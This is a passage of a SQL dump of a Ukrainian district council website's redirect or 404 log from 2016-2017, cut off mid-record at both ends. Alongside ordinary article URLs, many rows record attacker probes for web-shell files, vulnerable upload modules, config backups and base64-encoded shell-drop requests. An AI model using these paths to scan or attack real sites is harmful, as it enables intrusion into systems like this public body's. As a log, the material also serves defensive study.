00:00:00',301),(28854,'http://malyn-rayrada.gov.ua/index.php/1148-vr-ukrajini-prijnyala-zakon-pro-mistsevi-vibori',NULL,'','',28,0,'2016-10-28 10:55:46','0000-00-00 00:00:00',301),(28855,'http://www.malyn-rayrada.gov.ua/index.php/1330-do-vidoma-pensioneriv-mista-ta-rajonu?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-28 12:35:43','0000-00-00 00:00:00',301),(28856,'http://malyn-rayrada.gov.ua/index.php/1404-novini-iz-rajonnoji-spartakiadi',NULL,'','',47,0,'2016-10-29 05:11:03','0000-00-00 00:00:00',301),(28857,'http://www.malyn-rayrada.gov.ua/index.php/1217-vitaemo-iz-svyatami-dnem-zakhisnika-ukrajini-ta-pokrovoyu-presvyatoji-bogoroditsi',NULL,'','',30,0,'2016-10-29 05:50:27','0000-00-00 00:00:00',301),(28858,'http://www.malyn-rayrada.gov.ua/index.php/1409-ogoloshennya-2?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-29 07:56:27','0000-00-00 00:00:00',301),(28859,'http://www.malyn-rayrada.gov.ua/index.php/1265-pro-provedenu-robotu-po-aktsiji-miloserdya-u-2015rotsi',NULL,'','',30,0,'2016-10-29 15:03:11','0000-00-00 00:00:00',301),(28860,'http://www.malyn-rayrada.gov.ua/index.php/1403-sportivni-novini',NULL,'','',34,0,'2016-10-29 23:21:59','0000-00-00 00:00:00',301),(28861,'http://www.malyn-rayrada.gov.ua/index.php/801-nacionalnij-ekzit-pol-drugogo-turu-ne-bude',NULL,'','',23,0,'2016-10-30 00:25:24','0000-00-00 00:00:00',301),(28862,'http://www.malyn-rayrada.gov.ua/index.php/35-zhiteli-slobidskoi-gromadi-vidznachili-den-ljudej',NULL,'','',29,0,'2016-10-30 08:30:59','0000-00-00 00:00:00',301),(28863,'http://malyn-rayrada.gov.ua/index.php/1016-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-povidomlyae-platnikiv',NULL,'','',16,0,'2016-10-30 12:44:37','0000-00-00 00:00:00',301),(28864,'http://www.malyn-rayrada.gov.ua/index.php/1341-oberezhno-grip',NULL,'','',29,0,'2016-10-30 13:39:01','0000-00-00 00:00:00',301),(28865,'http://www.malyn-rayrada.gov.ua/index.php/1459-pro-sklikannya-8-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',28,0,'2016-10-30 15:25:49','0000-00-00 00:00:00',301),(28866,'http://malyn-rayrada.gov.ua/index.php/942-uryad-zatverdzheno?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-31 00:52:50','0000-00-00 00:00:00',301),(28867,'http://malyn-rayrada.gov.ua/index.php/894-pro-posilennya-vidpovidalnosti-za-porushennya-viborchikh-prav-gromadyan',NULL,'','',28,0,'2016-10-31 01:09:54','0000-00-00 00:00:00',301),(28868,'http://malyn-rayrada.gov.ua/index.php/986-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-10-31 05:40:34','0000-00-00 00:00:00',301),(28869,'http://www.malyn-rayrada.gov.ua/index.php/1260-vitaemo-iz-svyatom',NULL,'','',30,0,'2016-10-31 06:40:34','0000-00-00 00:00:00',301),(28870,'http://www.malyn-rayrada.gov.ua/index.php/1435-vitaemo-iz-velikodnem',NULL,'','',28,0,'2016-10-31 12:12:08','0000-00-00 00:00:00',301),(28871,'http://www.malyn-rayrada.gov.ua/index.php/1180-do-uvagi-zhiteliv-malinshchini',NULL,'','',24,0,'2016-10-31 22:14:50','0000-00-00 00:00:00',301),(28872,'http://www.malyn-rayrada.gov.ua/index.php/895-pro-rozshirennya-povnovazhen-mistsevikh-rad-shchodo-upravlinnya-teritoriyami',NULL,'','',23,0,'2016-10-31 22:26:27','0000-00-00 00:00:00',301),(28873,'http://malyn-rayrada.gov.ua/index.php/1018-shanovna-gromada-malinshchini',NULL,'','',20,0,'2016-10-31 23:34:42','0000-00-00 00:00:00',301),(28874,'http://www.malyn-rayrada.gov.ua/index.php/1040-do-uvagi-zhiteliv-malinskogo-rajonu',NULL,'','',25,0,'2016-11-01 06:38:50','0000-00-00 00:00:00',301),(28875,'http://malyn-rayrada.gov.ua/index.php/1006-roglyanuto-pitannya-vikoristannya-mislivskikh-ugid?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-11-01 08:50:19','0000-00-00 00:00:00',301),(28876,'http://malyn-rayrada.gov.ua/index.php/881-pozachergovi-vibori-narodnikh-deputativ-ukrajini-26-zhovtnya-2014-roku-informatsiya-tsvk-stanom-na-20-godinu-28-09-2014-roku',NULL,'','',27,0,'2016-11-01 10:03:34','0000-00-00 00:00:00',301),(28877,'http://malyn-rayrada.gov.ua/index.php/1330-do-vidoma-pensioneriv-mista-ta-rajonu?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-11-01 16:45:37','0000-00-00 00:00:00',301),(28878,'http://malyn-rayrada.gov.ua//login.php?login=cmd',NULL,'','',2,0,'2016-11-02 00:28:54','0000-00-00 00:00:00',301),(28879,'http://malyn-rayrada.gov.ua/index.php/986-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue',NULL,'','',21,0,'2016-11-02 23:37:02','0000-00-00 00:00:00',301),(28880,'http://www.malyn-rayrada.gov.ua/index.php/1177-vitaemo-iz-svyatom-pershogo-dzvonika',NULL,'','',21,0,'2016-11-03 03:44:04','0000-00-00 00:00:00',301),(28881,'http://www.malyn-rayrada.gov.ua/index.php/974-shchodo-pensijnogo-zabezpechennya-osib-yaki-pereselilisya-z-avtonomnoji-respubliki-krim-ta-m-sevastopolya',NULL,'','',24,0,'2016-11-03 07:13:26','0000-00-00 00:00:00',301),(28882,'http://www.malyn-rayrada.gov.ua//login.php?login=cmd',NULL,'','',4,0,'2016-11-04 00:47:34','0000-00-00 00:00:00',301),(28883,'http://malyn-rayrada.gov.ua/index.php/1330-do-vidoma-pensioneriv-mista-ta-rajonu',NULL,'','',27,0,'2016-11-04 00:47:59','0000-00-00 00:00:00',301),(28884,'http://malyn-rayrada.gov.ua/index.php/1006-roglyanuto-pitannya-vikoristannya-mislivskikh-ugid',NULL,'','',22,0,'2016-11-04 02:47:15','0000-00-00 00:00:00',301),(28885,'http://www.malyn-rayrada.gov.ua/index.php/849-nareshti',NULL,'','',24,0,'2016-11-04 05:00:37','0000-00-00 00:00:00',301),(28886,'http://www.malyn-rayrada.gov.ua/index.php/989-indeksatsiya-normativnoji-groshovoji-otsinki-zemel',NULL,'','',22,0,'2016-11-04 05:02:05','0000-00-00 00:00:00',301),(28887,'http://www.malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/udd.php','',23,0,'2016-11-04 16:22:39','0000-00-00 00:00:00',301),(28888,'http://malyn-rayrada.gov.ua/index.php/993-grafik-prijomu-gromadyan-derzhavnimi-kadastrovimi-reestratorami',NULL,'','',4,0,'2016-11-04 21:33:27','0000-00-00 00:00:00',301),(28889,'http://www.malyn-rayrada.gov.ua/attachments/article/1572/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  10 Ñ ÐµÑ Ñ–Ñ 7.pdf',NULL,'','',2,0,'2016-11-05 19:06:24','0000-00-00 00:00:00',301),(28890,'http://www.malyn-rayrada.gov.ua/index.php/1353-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-informue',NULL,'','',28,0,'2016-11-06 07:02:09','0000-00-00 00:00:00',301),(28891,'http://www.malyn-rayrada.gov.ua//systeminfo.php',NULL,'http://www.googlebot.com/bot.html','',1,0,'2016-11-07 03:20:15','0000-00-00 00:00:00',301),(28892,'http://www.malyn-rayrada.gov.ua/index.php/151-svjatkuvali-bibliotekari-rajonu?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-11-07 17:59:50','0000-00-00 00:00:00',301),(28893,'http://www.malyn-rayrada.gov.ua/index.php/151-svjatkuvali-bibliotekari-rajonu',NULL,'','',25,0,'2016-11-07 21:49:42','0000-00-00 00:00:00',301),(28894,'http://malyn-rayrada.gov.ua/index.php/1575-pro-sklikannya-11-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-11-08 11:37:05','0000-00-00 00:00:00',301),(28895,'http://www.malyn-rayrada.gov.ua/index.php/1252-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-pidvishchennya-pensij-z-01-veresnya-2015-roku-vidbulos-ne-dlya-vsikh-kategorij',NULL,'','',28,0,'2016-11-09 16:13:57','0000-00-00 00:00:00',301),(28896,'http://www.malyn-rayrada.gov.ua/index.php/1575-pro-sklikannya-11-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',41,0,'2016-11-10 08:23:06','0000-00-00 00:00:00',301),(28897,'http://www.malyn-rayrada.gov.ua/xmlrpc-activate.php',NULL,'http://www.malyn-rayrada.gov.ua/xmlrpc-activate.php','',2,0,'2016-11-10 16:36:58','0000-00-00 00:00:00',301),(28898,'http://www.malyn-rayrada.gov.ua/cache/cachee.php',NULL,'http://www.malyn-rayrada.gov.ua/cache/cachee.php','',16,0,'2016-11-10 16:36:59','0000-00-00 00:00:00',301),(28899,'http://malyn-rayrada.gov.ua/index.php/1575-pro-sklikannya-11-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',38,0,'2016-11-11 22:34:46','0000-00-00 00:00:00',301),(28900,'http://www.malyn-rayrada.gov.ua/index.php/1409-ogoloshennya-2',NULL,'','',32,0,'2016-11-12 15:44:05','0000-00-00 00:00:00',301),(28901,'http://www.malyn-rayrada.gov.ua/index.php/1330-do-vidoma-pensioneriv-mista-ta-rajonu',NULL,'','',27,0,'2016-11-12 23:22:26','0000-00-00 00:00:00',301),(28902,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1549-pro-nadannya-dozvolu-teritorialnomu-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu-na-vlashtuvannya-shpakovich-o-m',NULL,'','',18,0,'2016-11-12 23:50:02','0000-00-00 00:00:00',301),(28903,'http://www.malyn-rayrada.gov.ua/attachments/article/1577/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  11 позачергова Ñ ÐµÑ Ñ–Ñ 7.pdf',NULL,'','',2,0,'2016-11-13 06:40:16','0000-00-00 00:00:00',301),(28904,'http://www.malyn-rayrada.gov.ua/index.php/1027-kogo-torknutsya-zmini-do-pensijnogo-zakonodavstva',NULL,'','',24,0,'2016-11-17 12:06:33','0000-00-00 00:00:00',301),(28905,'http://www.malyn-rayrada.gov.ua/index.php/1009-do-vidoma-deputativ-malinskoji-rajonnoji-radi',NULL,'','',23,0,'2016-11-18 19:10:55','0000-00-00 00:00:00',301),(28906,'http://www.malyn-rayrada.gov.ua/plugins/content/i.php',NULL,'','',1,0,'2016-11-19 08:16:23','0000-00-00 00:00:00',301),(28907,'http://www.malyn-rayrada.gov.ua/templates/beez/index.php',NULL,'','',1,0,'2016-11-19 08:16:23','0000-00-00 00:00:00',301),(28908,'http://www.malyn-rayrada.gov.ua/plugins/system/banip.php',NULL,'','',1,0,'2016-11-19 08:16:24','0000-00-00 00:00:00',301),(28909,'http://www.malyn-rayrada.gov.ua/plugins/content/upgrade/ncpf.php',NULL,'','',1,0,'2016-11-19 08:16:24','0000-00-00 00:00:00',301),(28910,'http://www.malyn-rayrada.gov.ua/login.php?login=cmd',NULL,'','',4,0,'2016-11-22 05:11:01','0000-00-00 00:00:00',301),(28911,'http://malyn-rayrada.gov.ua/attachments/article/1583/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  12 позачергова Ñ ÐµÑ Ñ–Ñ 7.pdf',NULL,'','',2,0,'2016-11-22 05:23:59','0000-00-00 00:00:00',301),(28912,'http://www.malyn-rayrada.gov.ua/attachments/article/1583/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  12 позачергова Ñ ÐµÑ Ñ–Ñ 7.pdf',NULL,'','',2,0,'2016-11-27 06:02:02','0000-00-00 00:00:00',301),(28913,'http://malyn-rayrada.gov.ua/index.php/942-uryad-zatverdzheno',NULL,'','',22,0,'2016-11-27 09:51:31','0000-00-00 00:00:00',301),(28914,'http://malyn-rayrada.gov.ua/index.php/1435-vitaemo-iz-velikodnem?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2016-11-29 04:24:01','0000-00-00 00:00:00',301),(28915,'http://www.malyn-rayrada.gov.ua/m/index.php?start=21',NULL,'','',1,0,'2016-12-02 10:15:18','0000-00-00 00:00:00',301),(28916,'http://www.malyn-rayrada.gov.ua/mobile/index.php?start=21',NULL,'','',1,0,'2016-12-02 10:22:14','0000-00-00 00:00:00',301),(28917,'http://malyn-rayrada.gov.ua/index.php/1435-vitaemo-iz-velikodnem',NULL,'','',33,0,'2016-12-05 02:34:04','0000-00-00 00:00:00',301),(28918,'http://www.malyn-rayrada.gov.ua/_file-manager/php/connector.php',NULL,'http://www.malyn-rayrada.gov.ua/_file-manager/php/connector.php','',1,0,'2016-12-05 16:48:46','0000-00-00 00:00:00',301),(28919,'http://www.malyn-rayrada.gov.ua/attachments/article/1564/Ð†Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ñ–Ñ  прокур.pdf',NULL,'','',2,0,'2016-12-05 20:17:29','0000-00-00 00:00:00',301),(28920,'http://malyn-rayrada.gov.ua/engine/engine.php',NULL,'malyn-rayrada.gov.ua','',2,0,'2016-12-06 23:26:59','0000-00-00 00:00:00',301),(28921,'http://www.malyn-rayrada.gov.ua/wp-includes/css/modules.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-includes/css/modules.php','',2,0,'2016-12-09 17:01:42','0000-00-00 00:00:00',301),(28922,'http://malyn-rayrada.gov.ua/bitrix/admin/',NULL,'','',1,0,'2016-12-11 02:06:07','0000-00-00 00:00:00',301),(28923,'http://malyn-rayrada.gov.ua/admin/index.php?route=common/login',NULL,'','',1,0,'2016-12-11 02:06:07','0000-00-00 00:00:00',301),(28924,'http://malyn-rayrada.gov.ua/index.php/admin/',NULL,'','',1,0,'2016-12-11 02:06:07','0000-00-00 00:00:00',301),(28925,'http://www.malyn-rayrada.gov.ua/index.php/1591-pro-sklikannya-13-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',41,0,'2016-12-11 06:28:11','0000-00-00 00:00:00',301),(28926,'http://www.malyn-rayrada.gov.ua/up.php?up=hous',NULL,'http://www.malyn-rayrada.gov.ua/up.php?up=hous','',1,0,'2016-12-12 04:03:23','0000-00-00 00:00:00',301),(28927,'http://www.malyn-rayrada.gov.ua/modules/modules/modules.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/modules/modules.php','',4,0,'2016-12-14 17:06:17','0000-00-00 00:00:00',301),(28928,'http://www.malyn-rayrada.gov.ua/zqsxvulp',NULL,'','',1,0,'2016-12-15 04:00:47','0000-00-00 00:00:00',301),(28929,'http://malyn-rayrada.gov.ua/index.php/1580-pro-sklikannya-12-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',27,0,'2016-12-15 18:35:04','0000-00-00 00:00:00',301),(28930,'http://www.malyn-rayrada.gov.ua/modules/attributewizardpro/file_upload.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/attributewizardpro/file_upload.php','',1,0,'2016-12-18 12:28:18','0000-00-00 00:00:00',301),(28931,'http://www.malyn-rayrada.gov.ua/info.php',NULL,'http://www.malyn-rayrada.gov.ua/info.php','',1,0,'2016-12-19 16:56:46','0000-00-00 00:00:00',301),(28932,'http://www.malyn-rayrada.gov.ua/libraries/joomla/cache/info.php',NULL,'http://www.malyn-rayrada.gov.ua/libraries/joomla/cache/info.php','',1,0,'2016-12-20 04:07:51','0000-00-00 00:00:00',301),(28933,'http://www.malyn-rayrada.gov.ua/configurationbak.php',NULL,'http://www.malyn-rayrada.gov.ua/configurationbak.php','',15,0,'2016-12-20 17:41:03','0000-00-00 00:00:00',301),(28934,'http://malyn-rayrada.gov.ua/index.php/1591-pro-sklikannya-13-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',21,0,'2016-12-20 20:01:33','0000-00-00 00:00:00',301),(28935,'http://www.malyn-rayrada.gov.ua/up.php',NULL,'http://www.malyn-rayrada.gov.ua/up.php','',28,0,'2016-12-22 03:13:31','0000-00-00 00:00:00',301),(28936,'http://malyn-rayrada.gov.ua/modules/attributewizardpro/file_upload.php',NULL,'http://malyn-rayrada.gov.ua/modules/attributewizardpro/file_upload.php','',2,0,'2016-12-22 08:58:42','0000-00-00 00:00:00',301),(28937,'http://malyn-rayrada.gov.ua/modules/columnadverts/uploadimage.php',NULL,'http://malyn-rayrada.gov.ua/modules/columnadverts/uploadimage.php','',1,0,'2016-12-22 09:03:07','0000-00-00 00:00:00',301),(28938,'http://malyn-rayrada.gov.ua/blog/wp-admin/setup-config.php',NULL,'','',2,0,'2016-12-22 18:37:12','0000-00-00 00:00:00',301),(28939,'http://malyn-rayrada.gov.ua/blog//wordpress/wp-admin/setup-config.php',NULL,'','',1,0,'2016-12-22 18:37:13','0000-00-00 00:00:00',301),(28940,'http://malyn-rayrada.gov.ua/wordpress/wp-admin/setup-config.php',NULL,'','',3,0,'2016-12-22 18:37:13','0000-00-00 00:00:00',301),(28941,'http://www.malyn-rayrada.gov.ua/attachments/article/1633/Ð¿Ñ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  14-7.pdf',NULL,'','',2,0,'2016-12-23 19:05:38','0000-00-00 00:00:00',301),(28942,'http://malyn-rayrada.gov.ua/up.php',NULL,'http://malyn-rayrada.gov.ua/up.php','',27,0,'2016-12-24 06:06:48','0000-00-00 00:00:00',301),(28943,'http://malyn-rayrada.gov.ua/index.php/1117-za-vikoristannya-zemel-byudzhet-povinen-otrimuvati-dodatkovi-koshti',NULL,'','',22,0,'2016-12-24 09:23:52','0000-00-00 00:00:00',301),(28944,'http://www.malyn-rayrada.gov.ua/goog1es.php',NULL,'http://www.malyn-rayrada.gov.ua/goog1es.php','',15,0,'2016-12-24 16:07:19','0000-00-00 00:00:00',301),(28945,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1598-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji',NULL,'','',30,0,'2016-12-24 17:55:01','0000-00-00 00:00:00',301),(28946,'http://www.malyn-rayrada.gov.ua/libraries/joomla/css.php',NULL,'http://www.malyn-rayrada.gov.ua/libraries/joomla/css.php','',8,0,'2016-12-25 16:33:44','0000-00-00 00:00:00',301),(28947,'http://www.malyn-rayrada.gov.ua/index.php/1580-pro-sklikannya-12-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',27,0,'2016-12-26 00:20:17','0000-00-00 00:00:00',301),(28948,'http://www.malyn-rayrada.gov.ua/Configss.php?check',NULL,'http://www.malyn-rayrada.gov.ua/Configss.php?check','',1,0,'2016-12-26 05:24:02','0000-00-00 00:00:00',301),(28949,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1620-pro-rajonnij-byudzhet-na-2017-rik',NULL,'https://www.google.com.ua/','',58,0,'2016-12-26 11:06:32','0000-00-00 00:00:00',301),(28950,'http://www.malyn-rayrada.gov.ua/xmlrps.php',NULL,'http://www.malyn-rayrada.gov.ua/xmlrps.php','',1,0,'2016-12-26 16:35:57','0000-00-00 00:00:00',301),(28951,'http://www.malyn-rayrada.gov.ua/libraries/joomla/wso.php',NULL,'http://www.malyn-rayrada.gov.ua/libraries/joomla/wso.php','',8,0,'2016-12-26 16:37:11','0000-00-00 00:00:00',301),(28952,'http://www.malyn-rayrada.gov.ua/google-assist.php',NULL,'http://www.malyn-rayrada.gov.ua/google-assist.php','',15,0,'2016-12-27 05:50:15','0000-00-00 00:00:00',301),(28953,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1598-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-derzhavnoji-administratsiji',NULL,'','',26,0,'2016-12-29 03:05:14','0000-00-00 00:00:00',301),(28954,'http://malyn-rayrada.gov.ua/assets/plugins/jquery-file-upload/index.html',NULL,'http://malyn-rayrada.gov.ua/assets/plugins/jquery-file-upload/index.html','',1,0,'2016-12-29 03:41:30','0000-00-00 00:00:00',301),(28955,'http://malyn-rayrada.gov.ua/index.php/1612-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-14-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',40,0,'2016-12-29 16:36:05','0000-00-00 00:00:00',301),(28956,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1620-pro-rajonnij-byudzhet-na-2017-rik',NULL,'','',41,0,'2016-12-30 18:58:53','0000-00-00 00:00:00',301),(28957,'http://www.malyn-rayrada.gov.ua/index.php/1634-pro-sklikannya-drugogo-plenarnogo-zasidannya-14-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',24,0,'2017-01-01 19:13:08','0000-00-00 00:00:00',301),(28958,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1626-pro-peredachu-koshtiv-na-zdijsnennya-vidatkiv-na-utrimannya-silskikh-selishchnikh-zakladiv-kulturi-ta-silskikh-selishchnikh-doshkilnikh-zakladiv-osviti-u-2017-rotsi',NULL,'','',26,0,'2017-01-02 05:02:53','0000-00-00 00:00:00',301),(28959,'http://malyn-rayrada.gov.ua/modules/simpleslideshow/uploadimage.php',NULL,'http://malyn-rayrada.gov.ua/modules/simpleslideshow/uploadimage.php','',1,0,'2017-01-03 15:42:14','0000-00-00 00:00:00',301),(28960,'http://malyn-rayrada.gov.ua/index.php/1634-pro-sklikannya-drugogo-plenarnogo-zasidannya-14-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',42,0,'2017-01-04 08:48:21','0000-00-00 00:00:00',301),(28961,'http://www.malyn-rayrada.gov.ua/error-logs.php',NULL,'http://www.malyn-rayrada.gov.ua/error-logs.php','',1,0,'2017-01-04 16:55:01','0000-00-00 00:00:00',301),(28962,'http://malyn-rayrada.gov.ua/modules/modules/modules.php',NULL,'http://malyn-rayrada.gov.ua/modules/modules/modules.php','',2,0,'2017-01-05 12:44:43','0000-00-00 00:00:00',301),(28963,'http://malyn-rayrada.gov.ua/wp-includes/css/modules.php',NULL,'http://malyn-rayrada.gov.ua/wp-includes/css/modules.php','',3,0,'2017-01-05 12:44:47','0000-00-00 00:00:00',301),(28964,'http://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/udd.php',NULL,'http://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/udd.php','',15,0,'2017-01-06 00:53:52','0000-00-00 00:00:00',301),(28965,'http://www.malyn-rayrada.gov.ua/bin/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/bin/logo_img.php','',11,0,'2017-01-08 07:35:46','0000-00-00 00:00:00',301),(28966,'http://www.malyn-rayrada.gov.ua/images/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/images/logo_img.php','',10,0,'2017-01-08 07:35:50','0000-00-00 00:00:00',301),(28967,'http://malyn-rayrada.gov.ua/images/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/images/logo_img.php','',9,0,'2017-01-08 14:51:06','0000-00-00 00:00:00',301),(28968,'http://malyn-rayrada.gov.ua/bin/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/bin/logo_img.php','',8,0,'2017-01-08 14:51:45','0000-00-00 00:00:00',301),(28969,'http://www.malyn-rayrada.gov.ua/libraries/joomla/web.php',NULL,'','',9,0,'2017-01-09 01:28:59','0000-00-00 00:00:00',301),(28970,'http://www.malyn-rayrada.gov.ua/media/css.php',NULL,'','',9,0,'2017-01-09 01:29:00','0000-00-00 00:00:00',301),(28971,'http://malyn-rayrada.gov.ua/media/css.php',NULL,'','',6,0,'2017-01-09 11:27:57','0000-00-00 00:00:00',301),(28972,'http://malyn-rayrada.gov.ua/libraries/joomla/web.php',NULL,'','',6,0,'2017-01-09 11:27:58','0000-00-00 00:00:00',301),(28973,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1626-pro-peredachu-koshtiv-na-zdijsnennya-vidatkiv-na-utrimannya-silskikh-selishchnikh-zakladiv-kulturi-ta-silskikh-selishchnikh-doshkilnikh-zakladiv-osviti-u-2017-rotsi',NULL,'','',24,0,'2017-01-10 20:00:24','0000-00-00 00:00:00',301),(28974,'http://www.malyn-rayrada.gov.ua/attachments/article/1638/Поіменне Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  14.pdf',NULL,'','',2,0,'2017-01-11 06:23:21','0000-00-00 00:00:00',301),(28975,'http://www.malyn-rayrada.gov.ua/media/mass.php',NULL,'','',11,0,'2017-01-11 10:41:31','0000-00-00 00:00:00',301),(28976,'http://www.malyn-rayrada.gov.ua/media/jmails.php?u',NULL,'','',2,0,'2017-01-11 10:41:31','0000-00-00 00:00:00',301),(28977,'http://www.malyn-rayrada.gov.ua/index.php/1607-pro-sklikannya-14-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',37,0,'2017-01-11 13:50:22','0000-00-00 00:00:00',301),(28978,'http://www.malyn-rayrada.gov.ua/includes/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/includes/logo_img.php','',2,0,'2017-01-11 13:53:00','0000-00-00 00:00:00',301),(28979,'http://www.malyn-rayrada.gov.ua/blog/wp-admin/setup-config.php',NULL,'','',2,0,'2017-01-11 16:11:31','0000-00-00 00:00:00',301),(28980,'http://malyn-rayrada.gov.ua/media/jmails.php?u',NULL,'','',2,0,'2017-01-11 19:41:02','0000-00-00 00:00:00',301),(28981,'http://malyn-rayrada.gov.ua/media/mass.php',NULL,'','',6,0,'2017-01-11 19:41:02','0000-00-00 00:00:00',301),(28982,'http://malyn-rayrada.gov.ua/includes/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/includes/logo_img.php','',3,0,'2017-01-12 18:54:40','0000-00-00 00:00:00',301),(28983,'http://malyn-rayrada.gov.ua/plesk-stat/',NULL,'http://malyn-rayrada.gov.ua/plesk-stat/','',1,0,'2017-01-13 03:51:38','0000-00-00 00:00:00',301),(28984,'http://malyn-rayrada.gov.ua/uso/',NULL,'http://malyn-rayrada.gov.ua/uso/','',1,0,'2017-01-13 05:08:12','0000-00-00 00:00:00',301),(28985,'http://malyn-rayrada.gov.ua/webalizer/',NULL,'http://malyn-rayrada.gov.ua/webalizer/','',1,0,'2017-01-13 09:08:38','0000-00-00 00:00:00',301),(28986,'http://www.malyn-rayrada.gov.ua/libraries/cms/modules.php',NULL,'http://www.malyn-rayrada.gov.ua/libraries/cms/modules.php','',1,0,'2017-01-13 12:56:41','0000-00-00 00:00:00',301),(28987,'http://www.malyn-rayrada.gov.ua/x.php',NULL,'','',7,0,'2017-01-13 13:27:08','0000-00-00 00:00:00',301),(28988,'http://www.malyn-rayrada.gov.ua/images/1ndex.php?z3=NXRiU2E4LnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:12','0000-00-00 00:00:00',301),(28989,'http://www.malyn-rayrada.gov.ua/sqlbak.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:14','0000-00-00 00:00:00',301),(28990,'http://www.malyn-rayrada.gov.ua/email.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:15','0000-00-00 00:00:00',301),(28991,'http://www.malyn-rayrada.gov.ua/functions.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:18','0000-00-00 00:00:00',301),(28992,'http://www.malyn-rayrada.gov.ua/cache/news.php?z3=NXRiU2E4LnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:23','0000-00-00 00:00:00',301),(28993,'http://www.malyn-rayrada.gov.ua/tmp.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',4,0,'2017-01-13 13:27:25','0000-00-00 00:00:00',301),(28994,'http://www.malyn-rayrada.gov.ua/shootme.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:26','0000-00-00 00:00:00',301),(28995,'http://www.malyn-rayrada.gov.ua/robots.txt.php?z3=NXRiU2E4LnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-01-13 13:27:36','0000-00-00 